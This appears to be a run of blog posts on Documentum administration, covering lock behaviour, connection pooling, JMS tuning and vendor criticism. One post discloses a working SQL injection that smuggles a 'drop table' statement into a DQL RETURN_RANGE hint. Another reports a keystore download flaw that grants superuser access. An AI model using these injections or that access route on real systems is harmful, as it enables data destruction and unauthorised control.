BugMakers :)

Frankly speaking, when I was writing previous blogpost I got surprised to discover that DQL update statement preserves the value of r_lock_owner attribute:

API> revert,c,09024be98006b104
...
OK
API> get,c,09024be98006b104,r_lock_owner
...
dmadmin
API> ?,c,update dm_document objects set object_name='xxx' where r_object_id='09024be98006b104'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> revert,c,09024be98006b104
...
OK
API> get,c,09024be98006b104,r_lock_owner
...
dmadmin
API> 

Unfortunately, it is not true when you update objects, which behaviour is customized via TBO:

API> retrieve,c,bs_doc_cash
...
09bc2c71806d6ffe
API> checkout,c,l
...
09bc2c71806d6ffe
API> ?,c,update bs_doc_cash objects set object_name='xxx' where r_object_id='09bc2c71806d6ffe'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> revert,c,09bc2c71806d6ffe
...
OK
API> get,c,09bc2c71806d6ffe,r_lock_owner
...

API>

but:

API> checkout,c,09bc2c71806d6ffe
...
09bc2c71806d6ffe
API> apply,c,,EXEC,QUERY,S,update bs_doc_cash objects set object_name='xxx' where r_object_id='09bc2c71806d6ffe',BOF_DQL,B,F
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  objects_updated                 : 1

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> revert,c,09bc2c71806d6ffe
...
OK
API> get,c,09bc2c71806d6ffe,r_lock_owner
...
dmadmin
API> 

Database connections. Part II

Well, previosely we defined an estimation for database connection – about twice amount of concurrent Documentum sessions – may be less, may be more, depends on application. Now the question: how many connections is it possible to create in database? OpenText thinks that the number of database connections is unlimited:

D2 runs on content server which has good scalability by adding additional content server nodes. Content server is often the bottleneck of the whole D2 topology when the system is running under a heavy load condition. When content server reaches its bottleneck, we could monitored the CPU usage of content server is up to 90% and the number of active sessions grows very fast. To add one additional content server node to the existing environment could improve system throughput significantly.
Officially we suggests adding one additional content server node on every 300 concurrent users’ growth. The mileage

which is actually not true, on the other hand if OpenText has written something like: our product fails to take advantage of best practices and does not pool database connections, it would be ridiculous, so instead of improving product they has preferred to declare another marketing bullshit.

So, why database connection pooling is important? If you try to ask google you will find something like: creating database connection is an expensive and time-consuming operation: application needs to perform TCP (or even TLS) handshake, authenticate, database needs to start new process, etc…, so, it is recommended to pool database connections. Unfortunately it is only a half of the truth – pools also limit the number of concurrent database connections, and it is important too, let me quote the best oracle database expert ever:

In looking at your Automatic Workload Repository report, I see that the longest-running events at the system level are latch-related: cache buffers chains and library cache. Additionally, your CPU time was way up there. Concurrency-based waits are caused by one thing and one thing only: having many concurrently active sessions. If you had fewer concurrently active sessions, you would by definition have fewer concurrency-based waits (fewer people contending with each other). I see that you had 134 sessions in the database running on a total of 4 CPU cores. Because it is not really possible for 4 CPU cores to allow 134 sessions to be concurrently active, I recommend that you decrease the number of concurrent sessions by reducing the size of your connection pool—radically. Cut your connection pool to something like 32. It is just not possible for 4 cores to run 134 things at the same time; 4 cores can run only 4 things at exactly the same time. If you reduce the concurrent user load, you’ll see those waits go down, response time go down, and your transaction rates improve. In short, you’ll find out that you can actually do more work with fewer sessions than you can with more.

I know that this fewer-does-more suggestion sounds counterintuitive, but I encourage you to watch this narrated Real World Performance video.

In this video, you’ll see what happens in a test of a 12-core machine running transactions and decreasing the size of a connection pool from an unreasonable number (in the thousands) to a reasonable number: 96. At 96 connections on this particular machine, the machine was able to do 150 percent the number of transactions per second and took the response time for these transactions from ~100 milliseconds down to ~5 milliseconds.

Short of reducing your connection pool size (and therefore changing the way the application is using the database by queuing in the middle-tier connection pool instead of queuing hundreds of active sessions in the database), you would have to change your queries to make them request cache buffers chains latches less often. In short: tune the queries and the algorithms in the application. There is literally no magic here. Tweaking things at the system level might not be an option. Touching the application might have to be an option.

And from Documentum perspective, the only option to limit the number of database connections is to use shared server feature (fuck yeah, Oracle supports Database Resident Connection Pooling since 11g, but mature product does not). And do not pay much attention to EMC’s documents like Optimizing Oracle for EMC Documentum – such documents are wrong from beginning to end.

Beware of dbi services

Do you remember a guy, who accidentally discovered SQL injection in Content Server? I can’t understand why some people do such things, so I take it for granted that we can’t prevent such misbehaviour, however I wonder why these people come up with heart-piercing stories. Below are two another stories:

Documentum – Not able to install IndexAgent with xPlore 1.6 – everything is good except following command listing:

[xplore@full_text_server_01 ~]$ echo 'export DEVRANDOM=/dev/urandom' >> ~/.bash_profile
[root@full_text_server_01 ~]# yum -y install rng-tools.x86_64
Loaded plugins: product-id, search-disabled-repos, security, subscription-manager
Setting up Install Process
Resolving Dependencies
--> Running transaction check
...
Transaction Test Succeeded
Running Transaction
  Installing : rng-tools-5-2.el6_7.x86_64                                                                                                                                                                                     1/1
  Verifying  : rng-tools-5-2.el6_7.x86_64                                                                                                                                                                                     1/1
 
Installed:
  rng-tools.x86_64 0:5-2.el6_7
 
Complete!
[root@full_text_server_01 ~]# rpm -qf /etc/sysconfig/rngd
rng-tools-5-2.el6_7.x86_64
[root@full_text_server_01 ~]#
[root@full_text_server_01 ~]# sed -i 's,EXTRAOPTIONS=.*,EXTRAOPTIONS=\"-r /dev/urandom -o /dev/random -t 0.1\",' /etc/sysconfig/rngd
[root@full_text_server_01 ~]# cat /etc/sysconfig/rngd
# Add extra options here
EXTRAOPTIONS="-r /dev/urandom -o /dev/random -t 0.1"
[root@full_text_server_01 ~]#
[root@full_text_server_01 ~]# chkconfig --level 345 rngd on
[root@full_text_server_01 ~]# chkconfig --list | grep rngd
rngd            0:off   1:off   2:off   3:on    4:on    5:on    6:off
[root@full_text_server_01 ~]#
[root@full_text_server_01 ~]# service rngd start
Starting rngd:                                             [  OK  ]
[root@full_text_server_01 ~]#

which actually looks exactly the same as my recommendations for increasing entropy on Linux/VMWare, and the real gem is how blogpost author tried to protect himself – there are even four explanations why it looks extremely similar:

  • I would say the source is myself
  • At that time, I opened a SR# with the EMC Support
  • These commands haven’t been provided by EMC, they are part of our IQs since 2014/2015
  • Moreover how is that a proof? I mean all I did is a sed command to update the file /etc/sysconfig/rngd and the setup of the rngd service using chkconfig… There is no magic here, there is nothing secret…

Well, I would buy the last explanation if there were no following inconsistencies:

  • What was the reason to execute rpm -qf /etc/sysconfig/rngd if you already installed rng-tools? In my recommendations I used this command to show where /etc/sysconfig/rngd file came from
  • DEVRANDOM environment variable affects Content Server only, in java environment it does not make sense
  • The second blogpost, see below…

Documentum – Increase the number of concurrent_sessions – initially the solution was posted 4 years ago on ECN blog, moreover it is also published in EMC KB (note the publication date – it is not consistent with “A few months ago at one of our customer …” statement):

and in another EMC KB (wow! there is a mention of 1100):

Actually, as it was mentioned in my ECN blogpost – the DM_FD_SETSIZE “option” is “officially” available since 6.7SP1P19 and 6.7SP2P04 (and as well in 7.0, 7.1, 7.2 and 7.3, not officially this option is available since 6.7SP1P15), so, I wonder how it was possible that DBI guys were able to do following:

An EMC internal task (CS-40186) was opened to discuss this point and to discuss the possibility to increase this maximum number. Since the current default limit is set only in regards to the default OS value of 1024, if this value is increased to 4096 for example (which was our case since the beginning), then there is no real reason to be stuck at 1020 on Documentum side. The Engineering Team implemented a change in the binaries that allows changing the limit

Moreover, there is another inconsistency: until CS-40517 EMC was suggesting to launch multiple Content Server instances on the same host in order to overcome the limit on 1020 concurrent sessions per Content Server instance, so in case of blogpost author he was need to launch two Content Servers on each host and get an overall limit of 4080 concurrent sessions, but in my case I was need to launch about 10 Content Servers, and, because I was considering such configuration as unmanageable, I performed some research and filed a CR on November 2012.

Poor documentation or backdoor?

Four months ago I disclosed a vulnerability in Documentum 7.3/PostgreSQL, which allows attacker to execute arbitrary SQL statements, interesting thing here is vulnerability description is bit wrong, i.e. prerequisite “return_top_results_row_based config option is set to false” is not required:

Connected to Documentum Server running Release 7.3.0010.0013  Linux64.Postgres
Session id is s0
API> ?,c,select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
     [DM_QUERY_E_INVALID_POSITION]error:  
       "The ORDER BY position number 1;drop table dm_user_s;  
       is out of range of the number of items in the select list."


API> ?,c,select count(*) from dm_user ENABLE (OBJECT_BASED,RETURN_RANGE 1 10 '1;drop table dm_user_s;')
     [DM_QUERY_E_CURSOR_ERROR]error:  
       "A database error has occurred during the creation of a cursor 
       (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s 
       because other objects depend on it; Error while executing the query')."

What is OBJECT_BASED hint?

JMS high availability feature. Part II

Why I did recall a feature, which I have never used before and will never use in the future? The explanation is following: In order to refresh my memory I was reading installation guide for Content Server 7.3 and noticed following statement:

Actually, documentation does not explain what does mean “methods requiring trusted authentication”, it seems that remote JMS supports workflow methods only, but from any perspective this statement sounds weird, the problem is on that moment I already discovered vulnerability in Content Server which allows attacker to download $DOCUMENTUM_SHARED/config/dfc.keystore file, this file is very interesting because it allows to connect to Content Server as superuser (note the value of server_trust_priv flag):

[dmadmin@docu72dev01 config]$ keytool -list -v -keystore dfc.keystore 
Enter keystore password:  

*****************  WARNING WARNING WARNING  *****************
* The integrity of the information stored in your keystore  *
* has NOT been verified!  In order to verify its integrity, *
* you must provide your keystore password.                  *
*****************  WARNING WARNING WARNING  *****************

Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

Alias name: dfc
Creation date: May 5, 2015
Entry type: PrivateKeyEntry
Certificate chain length: 1
Certificate[1]:
Owner: CN=dfc_zOkF5qKyACcQUjLJD2bt1y3dXr0a, O=EMC, OU=Documentum
Issuer: CN=dfc_zOkF5qKyACcQUjLJD2bt1y3dXr0a, O=EMC, OU=Documentum
Serial number: 4d23be10ce8e183732c451091e0e3dbf
Valid from: Tue May 05 16:03:10 MSK 2015 until: Fri May 02 16:08:10 MSK 2025
Certificate fingerprints:
         MD5:  8B:BD:5C:F6:18:9D:27:9F:28:A7:69:A4:45:AD:32:63
         SHA1: 37:CC:14:C7:3E:BA:8F:AF:CE:E8:E5:4E:D2:F5:01:AF:3E:B6:1D:3F
         SHA256: 88:FA:7A:04:F8:47:AE:88:AC:EB:D5:BE:28:80:A6:7E:21:51:34:86:A5:96:0E:FF:11:61:90:E9:EA:AC:B4:0C
         Signature algorithm name: SHA1withRSA
         Version: 1


*******************************************
*******************************************


API> retrieve,c,dm_client_rights where client_id='dfc_zOkF5qKyACcQUjLJD2bt1y3dXr0a'
...
08024be980000587
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : dfc_docu72dev01_3dXr0a
  title                           :
  subject                         :
  authors                       []: <none>
  keywords                      []: <none>
  resolution_label                :
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 1
  world_permit                    : 1
  log_entry                       :
  acl_domain                      : dmadmin
  acl_name                        : dm_45024be980000222
  language_code                   :
  client_id                       : dfc_zOkF5qKyACcQUjLJD2bt1y3dXr0a
  public_key_identifier           : 5F6CF69241D4745C01C943BAD1AFFB027398EF32
  host_name                       : docu72dev01
  allowed_roles                 []: <none>
  allow_all_roles                 : T
  allow_all_priv_modules          : F
  principal_auth_priv             : T
  server_trust_priv               : T
  app_name                        :
  is_globally_managed             : F

So, there is a kind of interesting situation: official software is unable to take advantage of trusted authentication, but attacker can 🙂

But on the last week EMC published another interesting support note – JMS high availability feature does not work:

JMS performance slowdown

About two months ago I had noticed a weird behaviour of JMS: after a while (the shortest period I had noticed was 2 days) the code related to “mathematical computations” starts executing extremely slow – if previously execution of certain block of code normally took about 10ms, after a while it takes about 5 minutes, such behaviour also accompanies by the following observation: JVM does not utilise all available cores, i.e. I see multiple (>10) “computation” threads executing the same block of code, but JVM does not consume more than 2 CPU cores.

I tried to eliminate all possible root causes (entropy, GC, RSA libraries), but nothing helped, today I have discovered following topics which look extremely similar to my performance issue:

And indeed, there is a difference between jboss 7.1 and 7.2 in standalone.sh:

@@ -102,11 +146,6 @@
         if [ "x$NO_COMPRESSED_OOPS" = "x" ]; then
             "$JAVA" $JVM_OPTVERSION -server -XX:+UseCompressedOops -version >/dev/null 2>&1 && PREPEND_JAVA_OPTS="$PREPEND_JAVA_OPTS -XX:+UseCompressedOops"
         fi
-
-        NO_TIERED_COMPILATION=`echo $JAVA_OPTS | $GREP "\-XX:\-TieredCompilation"`
-        if [ "x$NO_TIERED_COMPILATION" = "x" ]; then
-            "$JAVA" $JVM_OPTVERSION -server -XX:+TieredCompilation -version >/dev/null 2>&1 && PREPEND_JAVA_OPTS="$PREPEND_JAVA_OPTS -XX:+TieredCompilation"
-        fi
     fi
 
     JAVA_OPTS="$PREPEND_JAVA_OPTS $JAVA_OPTS"

I have tried to disable TieredCompilation option and now I continue to monitor JMS behaviour 🙂

JMS high availability feature

The topic of this blogpost seems to be one of the most useless things in Documentum – I already mentioned that in What is wrong in Documentum. Part I, but it seems that talented team is still trying to “improve” this “feature”:

so, I think this topic deserves more thorough explanation.

Well, why do we need JMS? Frankly speaking, ten years ago I was bullshitting customers by describing JMS like: “It is an embedded application server, purposed to execute custom business logic” – means nothing, but sounds good 🙂 In real life JMS is a single point of failure which causes 80% of issues. So, if it is so unstable and affects business-users we need to stabilise it somehow – and there is a big difference between talented team and me: when I see phrase single point of failure I start thinking how to eliminate/avoid “point of failure”, when talented team see the same phrase they think about how to eliminate “single” (I have no idea why, m.b. it is just hard to read the whole phrase).

Quick question: JMS in Documentum 7.3 supports both load-balancing and failover (this was highlighted as a key enhancement) – do we really need load-balancing capabilities? How to answer to this question? Put load on Content Server and measure what resources are consumed by components, typically, I get something like:

So, Content Server consumes five times more resources than JMS, do I need to load balance JMS? Definitely not! I need to load balance Content Serves.

Now about failover capabilities. Let’s list everything which is typically executed on JMS:

  • workflow methods – I can’t understand why workflow agent is still a part of Content Server if JMS can do the same, moreover, there is no reason to failover workflow methods – slight delays in workflows, caused by JMS failures, do not affect business-users – you just need to monitor JMS health
  • job methods – the same considerations as above (dm_agent_exec is a piece of shit)
  • lifecycle methods – looks like a design gap: I can’t understand why lifecycle transitions are implemented as docbase methods: dm_bp_transition_java method just reads information about lifecycle states and executes corresponding SBOs – why do not do the same on TBO side?
  • custom docbase methods – you are a bloody idiot if custom docbase methods are a part of your application
  • mail methods – looks like a design gap too: it would be more convenient to add a special flag to dmi_queue_item objects which would indicate whether the corresponding email has been sent or not

Did I miss something? Yes, in Documentum 7.3 talented team implemented SAML authentication through JMS – taking opensource C++ implementation was too difficult.